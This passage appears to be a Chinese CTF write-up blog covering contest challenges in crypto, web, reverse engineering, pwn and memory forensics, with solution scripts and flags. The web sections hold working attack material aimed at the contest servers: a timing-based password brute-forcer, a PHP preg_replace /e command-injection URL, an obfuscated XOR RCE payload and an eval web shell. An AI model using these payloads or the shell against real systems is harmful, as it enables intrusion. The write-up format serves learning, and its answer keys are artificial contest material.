new_index = (alpha1.find(possible_char) + key_nums[pointer]) % 26
# 修复索引越界问题,确保 new_index ^ pointer 仍然在范围内
if (new_index ^ pointer) < 26 and alpha1[new_index ^ pointer] == i:
ans += possible_char
pointer = (pointer + 1) % len(key_nums)
break
elif i in alpha2:
# 爆破 alpha2 范围内的字符
for possible_char in alpha2:
new_index = (alpha2.find(possible_char) + key_nums[pointer]) % 26
# 修复索引越界问题,确保 new_index ^ pointer 仍然在范围内
if (new_index ^ pointer) < 26 and alpha2[new_index ^ pointer] == i:
ans += possible_char
pointer = (pointer + 1) % len(key_nums)
break
else:
# 非字母字符直接添加
ans += i
return ans
# 使用爆破解密
flag = decrypt(ciphertext, key_nums)
print(f"Decrypted flag: {flag}")flag{W31c0me_t0_DRCTF}Frank1q22来送礼物了
先是完成三个小挑战
pen=https://yo1o.top/liwu.php
&challenge=http://frank1q22.github.io@yo1o.top/uploads/o.php然后来到jali里面,发现phpinfo()没有被ban
http://ctf.wdsec.com.cn:33444/nlrce.php?nlctf=phpinfo();
得到flag
flag{6efff2f2-e035-496c-958c-937f1cd93a00} Web也会有签到
通过看源代码得到base64编码,解码后得到flag
flag{0efa99484bf5edd7c198e83acb49ebd2}wc,是php
先是通过时间长度找到pass
import time
import requests
url = "http://ctf.wdsec.com.cn:33232/frank1q22-levelLEVEL1.php" # 替换为题目真实地址
password_length = 0
# Step 1: 确定密码长度
for length in range(1, 21): # 假设最大密码长度为 20
data = {"pass": "0" * length}
start_time = time.time()
response = requests.post(url, data=data)
elapsed_time = time.time() - start_time
if "Wrong Length!" not in response.text:
password_length = length
print(f"[+] 密码长度为: {password_length}")
break
# Step 2: 逐字符破解密码
password = ""
for i in range(password_length):
for digit in range(10): # 密码仅包含数字 0-9
test_pass = password + str(digit) + "0" * (password_length - len(password) - 1)
data = {"pass": test_pass}
start_time = time.time()
response = requests.post(url, data=data)
elapsed_time = time.time() - start_time
# 判断响应时间是否显著增加
if elapsed_time > (i + 1):
password += str(digit)
print(f"[+] 当前密码为: {password}")
break
print(f"[+] 破解成功,密码为: {password}")
# Step 3: 提交完整密码,获取 key2
final_response = requests.post(url, data={"pass": password})
print(final_response.text)
'''
┌──(yolo㉿Yolo)-[~/desktop]
└─$ python3 naitime.py
[+] 密码长度为: 8
[+] 当前密码为: 6
[+] 当前密码为: 65
[+] 当前密码为: 655
[+] 当前密码为: 6554
[+] 当前密码为: 65546
[+] 当前密码为: 655461
[+] 当前密码为: 6554616
[+] 当前密码为: 65546169
[+] 破解成功,密码为: 65546169
<code><span style="color: #000000">
*****(中间是些没用信息就滤过了)
</code>The final challenge in FRANK1Q22-LEVELlevel2.php
'''
接下来看看挑战2
可以使用/e修饰符漏洞
http://ctf.wdsec.com.cn:33232/FRANK1Q22-LEVELlevel2.php?a=/.*/e&b=system(%27cat%20/flag%27)&c=1
#flag{1fd472e8-8969-46ff-a8b1-32557267ee95}竟然是warmup
常用的两个md5值相同的不同值
s878926199a
s155964671a
("&"^"@").("!"^"@").("/"^"[").
http://ctf.wdsec.com.cn:33150/
NLhead=s878926199a&&NLhand=s155964671a&&Nai[Long.body=fat%0A&&NLfeet=$_=(%27%01%27^%27%60%27).(%27%08%27^%27%7b%27).(%27%08%27^%27%7b%27).(%27%05%27^%27%60%27).(%27%09%27^%27%7b%27).(%27%08%27^%27%7c%27);$__=%27_%27.(%27%07%27^%27%40%27).(%27%05%27^%27%40%27).(%27%09%27^%27%5d%27);$___=$$__;$_($___[_]);&_=phpinfo();构造shell
<?php @eval($_POST['attack']);?>
(@)(~%9A%89%9E%93)($_)(%AF%B0%AC%AB)(['(~%9E%8B%8B%9E%9C%94)']);
curl -o output.txt https://yo1o.top/uploads/env.txt考虑到它和我之前见到的rce类似,就尝试了我在misc上外带的方法,将我的服务器里的文件传递到比赛服务器上,然后用蚁剑连接,得到flag
RDCTF{7h1s-1s-0-f10g-1m-0-NL}图寻①
flag{7555eed6d4f599847ef983e9a982e93d}图寻②
这张图片真难找啊
flag{80c7218d9f5e7c332d15bc94c794f9c9}
tenstrings
CR400BF-B-5102
118.755,32.022
118.797,32.027
121.306,31.198
118.805,31.976
106.695,26.574
113.489,34.824
116.369,39.892
116.399,39.945
house学姐~~
116.868,40.337
116.316,40.001
116.402,39.997
116.331,40.007
116.405,39.911
刚刚看到群里消息,我就不美化了哈,你凑合着看
猫娘
RDCTF{Y0u_L1e_Th3_41_818a80e5a0ba}芙尔摩斯
RDCTF{fur1n4_15_cut3_af0440bbfe33}奶龙的手机
这道apk逆向还是蛮摸不着头脑的,因为我的脚本是让gpt写的
先使用jadx-gui找到主函数,然后分析得到密钥:nailong,还有密文,接着还有特殊的一种RC4加密
直接上脚本吧,说真的还挺稀里糊涂的,gpt怎么突然变的好用了
class NailongRC4:
def __init__(self, key):
self.S = list(range(256))
self.dragonCounter = 1
self.i = 0
self.j = 0
self.init_key(key)
def init_key(self, key):
key_len = len(key)
for i in range(256):
self.S[i] = i
self.j = 0
self.dragonCounter = 1
self.i = 0
for i in range(256):
self.dragonCounter = (self.dragonCounter + i + key[i % key_len]) & 255
self.j = (self.j + self.S[i] + key[i % key_len] + (self.dragonCounter ^ (i * 7))) & 255
self.S[i], self.S[self.j] = self.S[self.j], self.S[i]
self.i = 0
self.j = 0
def process(self, data):
output = bytearray(len(data))
for idx in range(len(data)):
self.i = (self.i + 1) & 255
self.j = (self.j + self.S[self.i] + (self.i * 3)) & 255
self.S[self.i], self.S[self.j] = self.S[self.j], self.S[self.i]
b = self.S[self.i]
b2 = self.S[self.j]
i6 = ((b ^ b2) ^ self.S[(self.dragonCounter + idx) & 255]) & 255
self.dragonCounter = (self.dragonCounter + i6 + b2) & 255
i7 = (b + b2 + self.S[(b ^ b2) & 255] + i6) & 255
output[idx] = self.S[i7] ^ data[idx]
return output
# 测试
key = b"nailong"
cipher_text = bytes([203, 225, 149, 144, 25, 131, 115, 59, 201, 96, 224, 63, 129, 6, 1, 253, 52, 180, 236, 154, 6, 62, 126, 160, 148, 97, 53, 121, 213, 33, 228, 104, 154, 0, 237, 241, 205, 198, 204, 162, 158, 194, 51, 240, 76])
rc4 = NailongRC4(key)
plain_text = rc4.process(cipher_text)
print("解密后的明文:", plain_text.decode())flag{hahah_woshibeiliya_guangzhiguo_wandanla}Happy奶龙
是个base64加密而已,不难
RDCTF{Hell0_This_1s_butt3rf1y_ConOratulationY_Y0u_g3t_Nl4O!}奶龙大帝
这是道简单的pyinstall逆向题
先使用pyinstxtractor解包,然后用uncompyle6分析pyc文件
┌──(y**㉿Y**)-[~/*****/****/pypackage.exe_extracted]
└─$ uncompyle6 pypackage.pyc
# uncompyle6 version 3.9.2
# Python bytecode version base 3.8.0 (3413)
# Decompiled from: Python 3.12.8 (main, Dec 13 2024, 13:19:48) [GCC 14.2.0]
# Embedded file name: RDCTF\pypackage.py
print("Welcome to RDCTF!")
print("Please input your flag:")
enc = "UGFWI{L_4p_wk3_P1on_Gudj0q_Hpshu0u!}"
user_input = input("> ")
shift = 3
def caesar_decrypt(ciphertext, shift):
decrypted_flag = ""
for char in ciphertext:
if char.isalpha():
base = ord("A") if char.isupper() else ord("a")
decrypted_char = chr((ord(char) - base - shift) % 26 + base)
decrypted_flag += decrypted_char
else:
decrypted_flag += char
else:
return decrypted_flag
correct_flag = caesar_decrypt(enc, shift)
if user_input == correct_flag:
print("Correct!")
else:
print("Incorrect flag. Try again!")
# okay decompiling pypackage.pyc分析完后,发现是个简单的凯撒密码
最后得到flag
RDCTF{I_4m_th3_M1lk_Drag0n_Emper0r!}##
upx
先在终端用upx -d脱壳
分析了一下里面的函数
这里我是结合两个工具一起逆向分析的
省了好多事呢
def rc4_like_decrypt():
# 加密数据和密钥
encrypted_flag = [
0x98, 0xD0, 0x20, 0x1C, 0xAB, 0x91, 0x53, 0x6F, 0x35, 0x30, 0x29, 0xFF, 0x51, 0x4B, 0x93, 0x2C,
0xA3, 0x86, 0xD8, 0x6C, 0x14, 0x77, 0x26, 0x77, 0xE3, 0xB7, 0xCE, 0x08
]
key = b"Wh4t_1s_tHE_K3y"
# 初始化 S-box 和 T-box
S = list(range(256))
T = [(key[i % len(key)]) for i in range(256)]
# Key Scheduling Algorithm (KSA)
j = 0
for i in range(256):
j = (j + S[i] + T[i]) % 256
S[i], S[j] = S[j], S[i]
# 解密 (伪随机数生成器 - PRGA)
i = j = 0
decrypted_flag = []
for byte in encrypted_flag:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
K = S[(S[i] + S[j]) % 256]
decrypted_flag.append(byte ^ K)
# 输出解密结果
return bytes(decrypted_flag)
# 调用解密函数
flag = rc4_like_decrypt()
# 检查结果
try:
print("Decrypted flag:", flag.decode()) # 尝试 UTF-8 解码
except UnicodeDecodeError:
print("Decrypted bytes:", flag)
print("Decrypted (hex):", flag.hex())
#RDCTF{RcA_1s_4_64s1C_eNcRYpt}无痛pwn之路
一把梭的pwn题
from pwn import *
# 远程连接目标地址和端口
p = remote('ctf.wdsec.com.cn', 33395)
# 构造输入 payload
payload = b'\x01\x02\x03\x04'
# 发送 payload
p.send(payload)
# 获取 flag 输出
p.interactive()
#flag{79083e7f-ca54-4d71-9831-01db15d0f22d}
ez_painting
先是filescan一下,找到了张png图片,它的位移量是
然后dump下来后就是flag了
0x3f16df20 \Users\Administrator\Desktop\未标题-1.png
flag{W3Lc0m3_T0_X21TCtF_2952df01e30d}启航杯坠机杯
这场比赛不好评价,平台崩溃了好多次,体验不佳
是场团队赛,和打国赛一样的配置,不过这次我必须对他们说声抱歉,因为RDctf截止时间和这个冲突,导致启航杯我没有认真打,好在队友们都是大佬,冲到了49名
这是他们写的wp
Comments NOTHING